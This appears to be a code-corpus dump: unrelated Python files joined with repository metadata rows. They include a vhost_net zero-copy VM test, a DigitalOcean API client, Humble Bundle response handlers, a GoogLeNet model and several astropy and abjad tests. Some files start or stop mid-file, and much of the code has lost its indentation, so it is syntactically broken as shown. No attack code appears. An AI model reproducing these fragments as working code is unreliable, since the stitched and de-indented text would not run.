:param params: Dictionary with the test parameters.
:param env: Dictionary with test environment.
"""
def zerocp_enable_status():
"""
        Check whether the host has enabled zero copy; if enabled return True,
else return False.
"""
def_para_path = "/sys/module/vho
|
st_net/parameters/experimental_zcopytx"
para_path = params.get("zcp_set_path", def_para_path)
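        # `grep 1 <para_path>` exits 0 when the parameter file contains 1, so a
        # zero (falsy) exit status below means zero copy is currently enabled.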
cmd_status = utils.system("grep 1 %s" % para_path, ignore_status=True)
if cmd_status:
return False
else:
return True
def enable_zerocopytx_in_host(enable=True):
"""
Enable or disable vhost_net zero copy in host
"""
cmd = "modprobe -rf vhost_net; "
if enable:
cmd += "modprobe vhost-net experimental_zcopytx=1"
else:
cmd += "modprobe vhost-net experimental_zcopytx=0"
if utils.system(cmd) or enable != zerocp_enable_status():
raise error.TestNAError("Set vhost_net zcopytx failed")
error.context("Set host vhost_net experimental_zcopytx", logging.info)
if params.get("enable_zerocp", 'yes') == 'yes':
enable_zerocopytx_in_host()
else:
enable_zerocopytx_in_host(False)
error.context("Boot vm with 'vhost=on'", logging.info)
params["vhost"] = "vhost=on"
params["start_vm"] = 'yes'
login_timeout = int(params.get("login_timeout", 360))
env_process.preprocess_vm(test, params, env, params.get("main_vm"))
vm = env.get_vm(params["main_vm"])
vm.verify_alive()
vm.wait_for_login(timeout=login_timeout)
guest_ip = vm.get_address()
error.context("Check guest nic is works by ping", logging.info)
status, output = utils_test.ping(guest_ip, count=10, timeout=20)
if status:
err_msg = "Run ping %s failed, after set zero copy" % guest_ip
raise error.TestError(err_msg)
elif utils_test.get_loss_ratio(output) == 100:
err_msg = "All packets lost during ping guest %s." % guest_ip
raise error.TestFail(err_msg)
    # vm.verify_alive() will also check for userspace or kernel crashes
    error.context("Check guest is alive and has no crash", logging.info)
vm.verify_alive()
|
JackDanger/sentry
|
src/sentry/digests/__init__.py
|
Python
|
bsd-3-clause
| 910
| 0
|
from __future__ import absolute_import
from collections import namedtuple
from django.conf import settings
from sentry.utils.dates import to_datetime
from sentry.utils.services import LazyServiceWrapper
from .backends.base import Backend # NOQA
from .backends.dummy import DummyBackend # NOQA
backend = LazyServiceWrapper(Backend, settings.SENTRY_DIGESTS,
                             settings.SENTRY_DIGESTS_OPTIONS,
                             (DummyBackend,))
backend.expose(locals())
class Record(namedtuple('Record', 'key value timestamp')):
@property
def datetime(self):
return to_datetime(self.timestamp)
ScheduleEntry = namedtuple('ScheduleEntry', 'key timestamp')
OPTIONS = frozenset((
'increment_delay',
    'maximum_delay',
'minimum_delay',
))
def get_option_key(plugin, option):
assert option in OPTIONS
return 'digests:{}:{}'.format(plugin, option)
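# For example (illustrative, following the format string above):
#   get_option_key('mail', 'increment_delay') -> 'digests:mail:increment_delay'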
|
lutris/humblebundle-python
|
humblebundle/handlers.py
|
Python
|
mit
| 5,985
| 0.000668
|
"""
Handlers to process the responses from the Humble Bundle API
"""
__author__ = "Joel Pedraza"
__copyright__ = "Copyright 2014, Joel Pedraza"
__license__ = "MIT"
from humblebundle import exceptions
from humblebundle import models
import itertools
import requests
# Helper methods
def parse_data(response):
try:
return response.json()
except ValueError as e:
raise exceptions.HumbleParseException("Invalid JSON: %s", str(e),
request=response.request,
response=response)
def get_errors(data):
errors = data.get('errors', None)
error_msg = ", ".join(itertools.chain.from_iterable(v for k, v in errors.items())) \
if errors else "Unspecified error"
return errors, error_msg
def authenticated_response_helper(response, data):
# Successful API calls might not have a success property.
# It's not enough to check if it's falsy, as None is acceptable
success = data.get('success', None)
if success is True:
return True
error_id = data.get('error_id', None)
errors, error_msg = get_errors(data)
# API calls that require login and have a missing or invalid token
if error_id == 'login_required':
raise exceptions.HumbleAuthenticationException(
error_msg, request=response.request, response=response
)
# Something happened, we're not sure what but we hope the error_msg is
# useful
if success is False or errors is not None or error_id is not None:
raise exceptions.HumbleResponseException(
error_msg, request=response.request, response=response
)
# Response had no success or errors fields, it's probably data
return True
# Response handlers
def login_handler(client, response):
""" login response always returns JSON """
data = parse_data(response)
success = data.get('success', None)
if success is True:
return True
captcha_required = data.get('captcha_required')
authy_required = data.get('authy_required')
errors, error_msg = get_errors(data)
if errors:
captcha = errors.get('captcha')
if captcha:
raise exceptions.HumbleCaptchaException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
username = errors.get('username')
if username:
raise exceptions.HumbleCredentialException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
authy_token = errors.get("authy-token")
if authy_token:
raise exceptions.HumbleTwoFactorException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
raise exceptions.HumbleAuthenticationException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
def gamekeys_handler(client, response):
""" get_gamekeys response always returns JSON """
data = parse_data(response)
if isinstance(data, list):
return [v['gamekey'] for v in data]
# Let the helper function raise any common exceptions
    authenticated_response_helper(response, data)
# We didn't get a list, or an error message
raise exceptions.HumbleResponseException(
"Unexpected response body", request=response.request, response=response
)
def order_list_handler(client, response):
""" order_list response always returns JSON """
data = parse_data(response)
if isinstance(data, list):
return [models.Order(client, order) for order in data]
# Let the helper function raise any common exceptions
authenticated_response_helper(response, data)
# We didn't get a list, or an error message
raise exceptions.HumbleResponseException(
"Unexpected response body", request=response.request, response=response
)
def order_handler(client, response):
""" order response might be 404 with no body if not found """
if response.status_code == requests.codes.not_found:
raise exceptions.HumbleResponseException(
"Order not found", request=response.request, response=response
)
data = parse_data(response)
# The helper function should be sufficient to catch any other errors
if authenticated_response_helper(response, data):
return models.Order(client, data)
def claimed_entities_handler(client, response):
"""
claimed_entities response always returns JSON
returns parsed json dict
"""
data = parse_data(response)
# The helper function should be sufficient to catch any errors
if authenticated_response_helper(response, data):
return data
def sign_download_url_handler(client, response):
""" sign_download_url response always returns JSON """
data = parse_data(response)
# If the request is unauthorized (this includes invalid machine names) this
    # response has its own error syntax
errors = data.get('_errors', None)
message = data.get('_message', None)
if errors:
error_msg = "%s: %s" % (errors, message)
raise exceptions.HumbleResponseException(
error_msg, request=response.request, response=response
)
# If the user isn't signed in we get a "typical" error response
if authenticated_response_helper(response, data):
return data['signed_url']
def store_products_handler(client, response):
""" Takes a results from the store as JSON and converts it to object """
data = parse_data(response)
return [models.StoreProduct(client, result) for result in data['results']]
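# Rough usage sketch (illustrative, not part of the original module): each
# handler takes the API client and a `requests.Response`; e.g., given a
# response `resp` from the gamekeys endpoint,
#     keys = gamekeys_handler(client, resp)   # -> list of gamekey strings
# while order_handler(client, resp) would yield a models.Order instance.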
|
nayyarv/MonteGMM
|
Inference/BayesInference.py
|
Python
|
mit
| 844
| 0.016588
|
__author__ = 'Varun Nayyar'
from Utils.MFCCArrayGen import emotions, speakers, getCorpus
from MCMC import MCMCRun
from emailAlerter import alertMe
def main2(numRuns = 100000, numMixtures = 8, speakerIndex = 6):
import time
for emotion in emotions:
        start = time.ctime()
Xpoints = getCorpus(emotion, speakers[speakerIndex])
        message = MCMCRun(Xpoints, emotion+"-"+speakers[speakerIndex], numRuns, numMixtures)
message += "Start time: {}\nEnd Time: {}\n".format(start, time.ctime())
message += "\nNumRuns: {}, numMixtures:{}\n ".format(numRuns, numMixtures)
message += "\nEmotion: {}, speaker:{}\n".format(emotion, speakers[speakerIndex])
alertMe(message)
if __name__ == "__main__":
for i in xrange(len(speakers)):
main2(numMixtures=8, speakerIndex=i)
|
incuna/django-user-deletion
|
user_deletion/__init__.py
|
Python
|
bsd-2-clause
| 61
| 0
|
default_app_config = 'user_deletion.apps.UserDeletionConfig'
|
2prime/DeepLab
|
ResNet/models/googlenet.py
|
Python
|
mit
| 3,237
| 0.001236
|
'''GoogLeNet with PyTorch.'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class Inception(nn.Module):
def __init__(self, in_planes, n1x1, n3x3red, n3x3, n5x5red, n5x5, pool_planes):
super(Inception, self).__init__()
# 1x1 conv branch
self.b1 = nn.Sequential(
nn.Conv2d(in_planes, n1x1, kernel_size=1),
nn.BatchNorm2d(n1x1),
nn.ReLU(True),
)
# 1x1 conv -> 3x3 conv branch
self.b2 = nn.Sequential(
nn.Conv2d(in_planes, n3x3red, kernel_size=1),
nn.BatchNorm2d(n3x3red),
nn.ReLU(True),
nn.Conv2d(n3x3red, n3x3, kernel_size=3, padding=1),
nn.BatchNorm2d(n3x3),
nn.ReLU(True),
)
        # 1x1 conv -> 5x5 conv branch (the 5x5 is realized as two stacked 3x3 convs)
self.b3 = nn.Sequential(
nn.Conv2d(in_planes, n5x5red, kernel_size=1),
nn.BatchNorm2d(n5x5red),
nn.ReLU(True),
nn.Conv2d(n5x5red, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
nn.Conv2d(n5x5, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
)
# 3x3 pool -> 1x1 conv branch
self.b4 = nn.Sequential(
nn.MaxPool2d(3, stride=1, padding=1),
nn.Conv2d(in_planes, pool_planes, kernel_size=1),
nn.BatchNorm2d(pool_planes),
nn.ReLU(True),
)
def forward(self, x):
y1 = self.b1(x)
y2 = self.b2(x)
y3 = self.b3(x)
y4 = self.b4(x)
return torch.cat([y1,y2,y3,y4], 1)
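    # The four branches are concatenated along the channel dimension, so each
    # Inception block outputs n1x1 + n3x3 + n5x5 + pool_planes channels.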
class GoogLeNet(nn.Module):
def __init__(self):
super(GoogLeNet, self).__init__()
self.pre_layers = nn.Sequential(
nn.Conv2d(3, 192, kernel_size=3, padding=1),
nn.BatchNorm2d(192),
nn.ReLU(True),
)
self.a3 = Inception(192, 64, 96, 128, 16, 32, 32)
self.b3 = Inception(256, 128, 128, 192, 32, 96, 64)
self.maxpool = nn.MaxPool2d(3, stride=2, padding=1)
self.a4 = Inception(480, 192, 96, 208, 16, 48, 64)
self.b4 = Inception(512, 160, 112, 224, 24, 64, 64)
self.c4 = Inception(512, 128, 128, 256, 24, 64, 64)
self.d4 = Inception(512, 112, 144, 288, 32, 64, 64)
self.e4 = Inception(528, 256, 160, 320, 32, 128, 128)
self.a5 = Inception(832, 256, 160, 320, 32, 128, 128)
self.b5 = Inception(832, 384, 192, 384, 48, 128, 128)
self.avgpool = nn.AvgPool2d(8, stride=1)
self.linear = nn.Linear(1024, 10)
def forward(self, x):
out = self.pre_layers(x)
out = self.a3(out)
out = self.b3(out)
out = self.maxpool(out)
        out = self.a4(out)
out = self.b4(out)
out = self.c4(out)
out = self.d4(out)
out = self.e4(out)
out = self.maxpool(out)
out = self.a5(out)
out = self.b5(out)
out = self.avgpool(out)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
# net = GoogLeNet()
# x = torch.randn(1,3,32,32)
# y = net(Variable(x))
# print(y.size())
|
chuwy/dopy
|
dopy/manager.py
|
Python
|
mit
| 9,514
| 0.003363
|
#!/usr/bin/env python
#coding: utf-8
"""
This module simply sends request to the Digital Ocean API,
and returns their response as a dict.
"""
import requests
API_ENDPOINT = 'https://api.digitalocean.com'
class DoError(RuntimeError):
pass
class DoManager(object):
def __init__(self, client_id, api_key):
self.client_id = client_id
self.api_key = api_key
def all_active_droplets(self):
json = self.request('/droplets/')
return json['droplets']
def new_droplet(self, name, size_id, image_id, region_id,
ssh_key_ids=None, virtio=False, private_networking=False,
backups_enabled=False):
params = {
'name': name,
'size_id': size_id,
'image_id': image_id,
'region_id': region_id,
'virtio': virtio,
'private_networking': private_networking,
'backups_enabled': backups_enabled,
}
if ssh_key_ids:
params['ssh_key_ids'] = ssh_key_ids
json = self.request('/droplets/new', params=params)
return json['droplet']
def show_droplet(self, id):
json = self.request('/droplets/%s' % id)
return json['droplet']
def reboot_droplet(self, id):
json = self.request('/droplets/%s/reboot/' % id)
json.pop('status', None)
return json
def power_cycle_droplet(self, id):
json = self.request('/droplets/%s/power_cycle/' % id)
json.pop('status', None)
return json
def shutdown_droplet(self, id):
json = self.request('/droplets/%s/shutdown/' % id)
json.pop('status', None)
return json
def power_off_droplet(self, id):
json = self.request('/droplets/%s/power_off/' % id)
json.pop('status', None)
return json
def power_on_droplet(self, id):
json = self.request('/droplets/%s/power_on/' % id)
json.pop('status', None)
return json
def password_reset_droplet(self, id):
json = self.request('/droplets/%s/password_reset/' % id)
json.pop('status', None)
return json
def resize_droplet(self, id, size_id):
params = {'size_id': size_id}
json = self.request('/droplets/%s/resize/' % id, params)
        json.pop('status', None)
return json
def snapshot_droplet(self, id, name):
params = {'name': name}
json = self.request('/droplets/%s/snapshot/' % id, params)
json.pop('status', None)
return json
    def restore_droplet(self, id, image_id):
params = {'image_id': image_id}
json = self.request('/droplets/%s/restore/' % id, params)
json.pop('status', None)
return json
def rebuild_droplet(self, id, image_id):
params = {'image_id': image_id}
json = self.request('/droplets/%s/rebuild/' % id, params)
json.pop('status', None)
return json
def enable_backups_droplet(self, id):
json = self.request('/droplets/%s/enable_backups/' % id)
json.pop('status', None)
return json
def disable_backups_droplet(self, id):
json = self.request('/droplets/%s/disable_backups/' % id)
json.pop('status', None)
return json
def rename_droplet(self, id, name):
params = {'name': name}
json = self.request('/droplets/%s/rename/' % id, params)
json.pop('status', None)
return json
def destroy_droplet(self, id, scrub_data=True):
params = {'scrub_data': '1' if scrub_data else '0'}
json = self.request('/droplets/%s/destroy/' % id, params)
json.pop('status', None)
return json
#regions==========================================
def all_regions(self):
json = self.request('/regions/')
return json['regions']
#images==========================================
def all_images(self, filter='global'):
params = {'filter': filter}
json = self.request('/images/', params)
return json['images']
def show_image(self, image_id):
params= {'image_id': image_id}
json = self.request('/images/%s/' % image_id, params)
return json['image']
def destroy_image(self, image_id):
self.request('/images/%s/destroy' % image_id)
return True
def transfer_image(self, image_id, region_id):
params = {'region_id': region_id}
json = self.request('/images/%s/transfer/' % image_id, params)
json.pop('status', None)
return json
#ssh_keys=========================================
def all_ssh_keys(self):
json = self.request('/ssh_keys/')
return json['ssh_keys']
def new_ssh_key(self, name, pub_key):
params = {'name': name, 'ssh_pub_key': pub_key}
json = self.request('/ssh_keys/new/', params)
return json['ssh_key']
def show_ssh_key(self, key_id):
json = self.request('/ssh_keys/%s/' % key_id)
return json['ssh_key']
def edit_ssh_key(self, key_id, name, pub_key):
params = {'name': name, 'ssh_pub_key': pub_key} # the doc needs to be improved
json = self.request('/ssh_keys/%s/edit/' % key_id, params)
return json['ssh_key']
def destroy_ssh_key(self, key_id):
self.request('/ssh_keys/%s/destroy/' % key_id)
return True
#sizes============================================
def sizes(self):
json = self.request('/sizes/')
return json['sizes']
#domains==========================================
def all_domains(self):
json = self.request('/domains/')
return json['domains']
def new_domain(self, name, ip):
params = {
'name': name,
'ip_address': ip
}
json = self.request('/domains/new/', params)
return json['domain']
def show_domain(self, domain_id):
json = self.request('/domains/%s/' % domain_id)
return json['domain']
def destroy_domain(self, domain_id):
self.request('/domains/%s/destroy/' % domain_id)
return True
def all_domain_records(self, domain_id):
json = self.request('/domains/%s/records/' % domain_id)
return json['records']
def new_domain_record(self, domain_id, record_type, data, name=None, priority=None, port=None, weight=None):
params = {
'record_type': record_type,
'data': data,
}
if name: params['name'] = name
if priority: params['priority'] = priority
if port: params['port'] = port
        if weight: params['weight'] = weight
json = self.request('/domains/%s/records/new/' % domain_id, params)
        return json['domain_record'] if 'domain_record' in json else json['record'] # DO API docs say 'domain_record', but actually it's 'record'
def show_domain_record(self, domain_id, record_id):
json = self.request('/domains/%s/records/%s' % (domain_id, record_id))
return json['record']
def edit_domain_record(self, domain_id, record_id, record_type, data, name=None, priority=None, port=None, weight=None):
params = {
'record_type': record_type,
'data': data,
}
if name: params['name'] = name
if priority: params['priority'] = priority
if port: params['port'] = port
        if weight: params['weight'] = weight
json = self.request('/domains/%s/records/%s/edit/' % (domain_id, record_id), params)
return json['domain_record'] if 'domain_record' in json else json['record'] # DO API docs say 'domain_record' for /new/ but 'record' for /edit/.
def destroy_domain_record(self, domain_id, record_id):
        self.request('/domains/%s/records/%s/destroy/' % (domain_id, record_id))
        return True
#events===========================================
def show_event(self, event_id):
json = self.request('/events/%s' % event_id)
return json['event']
#low_level========================================
def request(self, path, params={}, method='GET'):
params['clie
|
MSeifert04/astropy
|
astropy/io/fits/tests/test_image.py
|
Python
|
bsd-3-clause
| 76,391
| 0.000406
|
# Licensed under a 3-clause BSD style license - see PYFITS.rst
import math
import os
import re
import time
import warnings
import pytest
import numpy as np
from numpy.testing import assert_equal
from astropy.io import fits
from astropy.tests.helper import catch_warnings, ignore_warnings
from astropy.io.fits.hdu.compressed import SUBTRACTIVE_DITHER_1, DITHER_SEED_CHECKSUM
from .test_table import comparerecords
from . import FitsTestCase
try:
import scipy # noqa
except ImportError:
HAS_SCIPY = False
else:
HAS_SCIPY = True
class TestImageFunctions(FitsTestCase):
def test_constructor_name_arg(self):
"""Like the test of the same name in test_table.py"""
hdu = fits.ImageHDU()
assert hdu.name == ''
assert 'EXTNAME' not in hdu.header
hdu.name = 'FOO'
assert hdu.name == 'FOO'
assert hdu.header['EXTNAME'] == 'FOO'
# Passing name to constructor
hdu = fits.ImageHDU(name='FOO')
assert hdu.name == 'FOO'
assert hdu.header['EXTNAME'] == 'FOO'
# And overriding a header with a different extname
hdr = fits.Header()
hdr['EXTNAME'] = 'EVENTS'
hdu = fits.ImageHDU(header=hdr, name='FOO')
assert hdu.name == 'FOO'
assert hdu.header['EXTNAME'] == 'FOO'
def test_constructor_ver_arg(self):
def assert_ver_is(hdu, reference_ver):
assert hdu.ver == reference_ver
assert hdu.header['EXTVER'] == reference_ver
hdu = fits.ImageHDU()
assert hdu.ver == 1 # defaults to 1
assert 'EXTVER' not in hdu.header
hdu.ver = 1
assert_ver_is(hdu, 1)
# Passing name to constructor
hdu = fits.ImageHDU(ver=2)
assert_ver_is(hdu, 2)
# And overriding a header with a different extver
hdr = fits.Header()
hdr['EXTVER'] = 3
hdu = fits.ImageHDU(header=hdr, ver=4)
assert_ver_is(hdu, 4)
# The header card is not overridden if ver is None or not passed in
hdr = fits.Header()
hdr['EXTVER'] = 5
hdu = fits.ImageHDU(header=hdr, ver=None)
assert_ver_is(hdu, 5)
hdu = fits.ImageHDU(header=hdr)
assert_ver_is(hdu, 5)
def test_constructor_copies_header(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/153
Ensure that a header from one HDU is copied when used to initialize new
HDU.
"""
ifd = fits.HDUList(fits.PrimaryHDU())
phdr = ifd[0].header
phdr['FILENAME'] = 'labq01i3q_rawtag.fits'
primary_hdu = fits.PrimaryHDU(header=phdr)
ofd = fits.HDUList(primary_hdu)
ofd[0].header['FILENAME'] = 'labq01i3q_flt.fits'
# Original header should be unchanged
assert phdr['FILENAME'] == 'labq01i3q_rawtag.fits'
def test_open(self):
# The function "open" reads a FITS file into an HDUList object. There
# are three modes to open: "readonly" (the default), "append", and
# "update".
# Open a file read-only (the default mode), the content of the FITS
# file are read into memory.
r = fits.open(self.data('test0.fits')) # readonly
        # data parts are lazily instantiated, so if we close the HDUList
        # without touching data, the data cannot be accessed.
r.close()
with pytest.raises(IndexError) as exc_info:
r[1].data[:2, :2]
# Check that the exception message is the enhanced version, not the
# default message from list.__getitem__
assert str(exc_info.value) == ('HDU not found, possibly because the index '
'is out of range, or because the file was '
'closed before all HDUs were read')
def test_open_2(self):
r = fits.open(self.data('test0.fits'))
info = ([(0, 'PRIMARY', 1, 'PrimaryHDU', 138, (), '', '')] +
[(x, 'SCI', x, 'ImageHDU', 61, (40, 40), 'int16', '')
for x in range(1, 5)])
try:
assert r.info(output=False) == info
finally:
r.close()
def test_open_3(self):
# Test that HDUs cannot be accessed after the file was closed
r = fits.open(self.data('test0.fits'))
r.close()
with pytest.raises(IndexError) as exc_info:
r[1]
# Check that the exception message is the enhanced version, not the
# default message from list.__getitem__
assert str(exc_info.value) == ('HDU not found, possibly because the index '
'is out of range, or because the file was '
'closed before all HDUs were read')
# Test that HDUs can be accessed with lazy_load_hdus=False
r = fits.open(self.data('test0.fits'), lazy_load_hdus=False)
r.close()
assert isinstance(r[1], fits.ImageHDU)
assert len(r) == 5
with pytest.raises(IndexError) as exc_info:
r[6]
        assert str(exc_info.value) == 'list index out of range'
# And the same with the global config item
assert fits.conf.lazy_load_hdus # True by default
fits.conf.lazy_load_hdus = False
try:
r = fits.open(self.data('test0.fits'))
r.close()
assert isinstance(r[1], fits.ImageHDU)
assert len(r) == 5
finally:
            fits.conf.lazy_load_hdus = True
def test_fortran_array(self):
# Test that files are being correctly written+read for "C" and "F" order arrays
a = np.arange(21).reshape(3,7)
b = np.asfortranarray(a)
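        # b holds the same values as a, only in Fortran (column-major) memory
        # order, so both files are expected to read back identical to a.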
afits = self.temp('a_str.fits')
bfits = self.temp('b_str.fits')
        # writing to str specified files
fits.PrimaryHDU(data=a).writeto(afits)
fits.PrimaryHDU(data=b).writeto(bfits)
np.testing.assert_array_equal(fits.getdata(afits), a)
np.testing.assert_array_equal(fits.getdata(bfits), a)
        # writing to fileobjs
aafits = self.temp('a_fileobj.fits')
bbfits = self.temp('b_fileobj.fits')
with open(aafits, mode='wb') as fd:
fits.PrimaryHDU(data=a).writeto(fd)
with open(bbfits, mode='wb') as fd:
fits.PrimaryHDU(data=b).writeto(fd)
np.testing.assert_array_equal(fits.getdata(aafits), a)
np.testing.assert_array_equal(fits.getdata(bbfits), a)
def test_fortran_array_non_contiguous(self):
# Test that files are being correctly written+read for 'C' and 'F' order arrays
a = np.arange(105).reshape(3,5,7)
b = np.asfortranarray(a)
        # writing to str specified files
afits = self.temp('a_str_slice.fits')
bfits = self.temp('b_str_slice.fits')
fits.PrimaryHDU(data=a[::2, ::2]).writeto(afits)
fits.PrimaryHDU(data=b[::2, ::2]).writeto(bfits)
np.testing.assert_array_equal(fits.getdata(afits), a[::2, ::2])
np.testing.assert_array_equal(fits.getdata(bfits), a[::2, ::2])
        # writing to fileobjs
aafits = self.temp('a_fileobj_slice.fits')
bbfits = self.temp('b_fileobj_slice.fits')
with open(aafits, mode='wb') as fd:
fits.PrimaryHDU(data=a[::2, ::2]).writeto(fd)
with open(bbfits, mode='wb') as fd:
fits.PrimaryHDU(data=b[::2, ::2]).writeto(fd)
np.testing.assert_array_equal(fits.getdata(aafits), a[::2, ::2])
np.testing.assert_array_equal(fits.getdata(bbfits), a[::2, ::2])
def test_primary_with_extname(self):
"""Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/151
Tests that the EXTNAME keyword works with Primary HDUs as well, and
interacts properly with the .name attribute. For convenience
hdulist['PRIMARY'] will still refer to the first HDU even if it has an
EXTNAME not equal to 'PRIMARY'.
"""
prihdr = fits.Header([('EXTNAME', 'XPRIMARY'), ('EXTVER', 1)])
hdul = fits.HDUList([fits.PrimaryHDU(header=prihdr)])
assert 'EXTNAME' in hdul[0].header
|
sathishpy/corrugation
|
corrugation/corrugation/doctype/cm_paper_management/test_cm_paper_management.py
|
Python
|
gpl-3.0
| 227
| 0.008811
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017, sathishpy@gmail.com and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestCMPaperManagement(unittest.TestCase):
pass
|
kbrafford/pg
|
examples/terrain.py
|
Python
|
mit
| 2,927
| 0.00205
|
from collections import defaultdict
import colorsys
import pg
def noise(x, z):
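    # The low-frequency term `a` sets the base elevation (roughly 0..32 via
    # (a + 1) * 16); the higher-frequency `b / 10` term adds fine surface detail.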
a = pg.simplex2(-x * 0.01, -z * 0.01, 4)
b = pg.simplex2(x * 0.1, z * 0.1, 4)
return (a + 1) * 16 + b / 10
def generate_color(x, z):
m = 0.005
h = (pg.simplex2(x * m, z * m, 4) + 1) / 2
s = (pg.simplex2(-x * m, z * m, 4) + 1) / 2
v = (pg.simplex2(x * m, -z * m, 4) + 1) / 2
v = v * 0.5 + 0.5
return colorsys.hsv_to_rgb(h, s, v)
class Window(pg.Window):
def setup(self):
self.wasd = pg.WASD(self, speed=30)
self.wasd.look_at((-20, 20, -8), (0, 0, 0))
self.context = pg.Context(pg.DirectionalLightProgram())
self.context.use_color = True
self.context.specular_power = 8.0
self.context.specular_multiplier = 0.3
normals = defaultdict(list)
position = []
normal = []
color = []
size = 50
# generate height map
height = {}
colors = {}
for x in xrange(-size, size + 1):
for z in xrange(-size, size + 1):
height[(x, z)] = noise(x, z)
colors[(x, z)] = generate_color(x, z)
# generate triangles and track normals for all vertices
for x in xrange(-size, size):
for z in xrange(-size, size):
t1 = [x + 0, z + 0, x + 1, z + 0, x + 0, z + 1]
t2 = [x + 0, z + 1, x + 1, z + 0, x + 1, z + 1]
for t in [t1, t2]:
x1, z1, x2, z2, x3, z3 = t
p1 = (x1, height[(x1, z1)], z1)
p2 = (x2, height[(x2, z2)], z2)
p3 = (x3, height[(x3, z3)], z3)
c1 = colors[(x1, z1)]
c2 = colors[(x2, z2)]
c3 = colors[(x3, z3)]
position.extend([p3, p2, p1])
color.extend([c3, c2, c1])
n = pg.normalize(pg.cross(pg.sub(p3, p1), pg.sub(p2, p1)))
normals[(x1, z1)].append(n)
normals[(x2, z2)].append(n)
normals[(x3, z3)].append(n)
# compute average normal for all vertices
for key, value in normals.items():
normals[key] = pg.normalize(reduce(pg.add, value))
for x, y, z in position:
normal.append(normals[(x, z)])
# generate vertex buffer
        vb = pg.VertexBuffer(pg.interleave(position, normal, color))
self.context.position, self.context.normal, self.context.color = (
vb.slices(3, 3, 3))
def update(self, t, dt):
matrix = pg.Matrix()
matrix = self.wasd.get_matrix(matrix)
matrix = matrix.perspective(65, self.aspect, 0.1, 1000)
self.context.matrix = matrix
self.context.camera_position = self.wasd.position
def draw(self):
self.clear()
self.context.draw()
if __name__ == "__main__":
pg.run(Window)
|
jyt109/termite-data-server
|
server_src/modules/core.py
|
Python
|
bsd-3-clause
| 4,206
| 0.07204
|
#!/usr/bin/env python
import os
import json
class TermiteCore:
def __init__( self, request, response ):
self.request = request
self.response = response
def GetConfigs( self ):
def GetServer():
return self.request.env['HTTP_HOST']
def GetDataset():
return self.request.application
def GetModel():
return self.request.controller
def GetAttribute():
return self.request.function
def GetDatasets( dataset ):
FOLDER_EXCLUSIONS = frozenset( [ 'admin', 'examples', 'welcome', 'init' ] )
applications_parent = self.request.env['applications_parent']
applications_path = '{}/applications'.format( applications_parent )
folders = []
for folder in os.listdir( applications_path ):
applications_subpath = '{}/{}'.format( applications_path, folder )
if os.path.isdir( applications_subpath ):
if folder not in FOLDER_EXCLUSIONS:
folders.append( folder )
folders = sorted( folders )
return folders
def GetModels( dataset, model ):
if dataset == 'init':
return None
app_data_path = '{}/data'.format( self.request.folder )
folders = []
for folder in os.listdir( app_data_path ):
app_data_subpath = '{}/{}'.format( app_data_path, folder )
if os.path.isdir( app_data_subpath ):
folders.append( folder )
folders = sorted( folders )
return folders
def GetAttributes( dataset, model, attribute ):
if dataset == 'init':
return None
if model == 'default':
return None
if model == 'lda':
return [
'DocIndex',
'TermIndex',
'TopicIndex',
'TermTopicMatrix',
'DocTopicMatrix',
'TopicCooccurrence'
]
elif model == 'corpus':
return [
'DocMeta',
'TermFreqs',
'TermCoFreqs'
]
else:
return []
server = GetServer()
dataset = GetDataset()
datasets = GetDatasets( dataset )
model = GetModel()
models = GetModels( dataset, model )
attribute = GetAttribute()
attributes = GetAttributes( dataset, model, attribute )
configs = {
'server' : server,
'dataset' : dataset,
'datasets' : datasets,
'model' : model,
'models' : models,
'attribute' : attribute,
'attributes' : attributes
}
return configs
def IsDebugMode( self ):
return 'debug' in self.request.vars
def IsJsonFormat( self ):
return 'format' in self.request.vars and 'json' == self.request.vars['format'].lower()
def GenerateResponse( self, params = {}, keysAndValues = {} ):
if self.IsDebugMode():
return self.GenerateDebugResponse()
else:
return self.GenerateNormalResponse( params, keysAndValues )
def GenerateDebugResponse( self ):
def GetEnv( env ):
			data = {}
for key in env:
value = env[key]
if isinstance( value, dict ) or \
					isinstance( value, list ) or isinstance( value, tuple ) or \
isinstance( value, str ) or isinstance( value, unicode ) or \
isinstance( value, int ) or isinstance( value, long ) or isinstance( value, float ) or \
value is None or value is True or value is False:
data[ key ] = value
else:
data[ key ] = 'N/A'
return data
info = {
'env' : GetEnv( self.request.env ),
'cookies' : self.request.cookies,
'vars' : self.request.vars,
'get_vars' : self.request.get_vars,
'post_vars' : self.request.post_vars,
'folder' : self.request.folder,
'application' : self.request.application,
'controller' : self.request.controller,
'function' : self.request.function,
'args' : self.request.args,
'extension' : self.request.extension,
'now' : str( self.request.now )
}
return json.dumps( info, encoding = 'utf-8', indent = 2, sort_keys = True )
def GenerateNormalResponse( self, params, keysAndValues = {} ):
data = {
'params' : params,
'configs' : self.GetConfigs()
}
data.update( keysAndValues )
dataStr = json.dumps( data, encoding = 'utf-8', indent = 2, sort_keys = True )
# Workaround while we build up the server-client architecture
self.response.headers['Access-Control-Allow-Origin'] = 'http://' + self.request.env['REMOTE_ADDR'] + ':8080'
if self.IsJsonFormat():
return dataStr
else:
data[ 'content' ] = dataStr
return data
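# Rough usage sketch (illustrative, not part of the original module), as called
# from a web2py controller where `request` and `response` are in scope:
#     core = TermiteCore(request, response)
#     return core.GenerateResponse(params={})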
|
mscuthbert/abjad
|
abjad/tools/selectiontools/test/test_selectiontools_Parentage_logical_voice.py
|
Python
|
gpl-3.0
| 10,702
| 0.000748
|
# -*- encoding: utf-8 -*-
from abjad import *
import pytest
def test_selectiontools_Parentage_logical_voice_01():
r'''An anonymous staff and its contained unvoiced leaves share
the same signature.
'''
staff = Staff("c'8 d'8 e'8 f'8")
containment = inspect_(staff).get_parentage().logical_voice
for component in iterate(staff).by_class():
assert inspect_(component).get_parentage().logical_voice == containment
def test_selectiontools_Parentage_logical_voice_02():
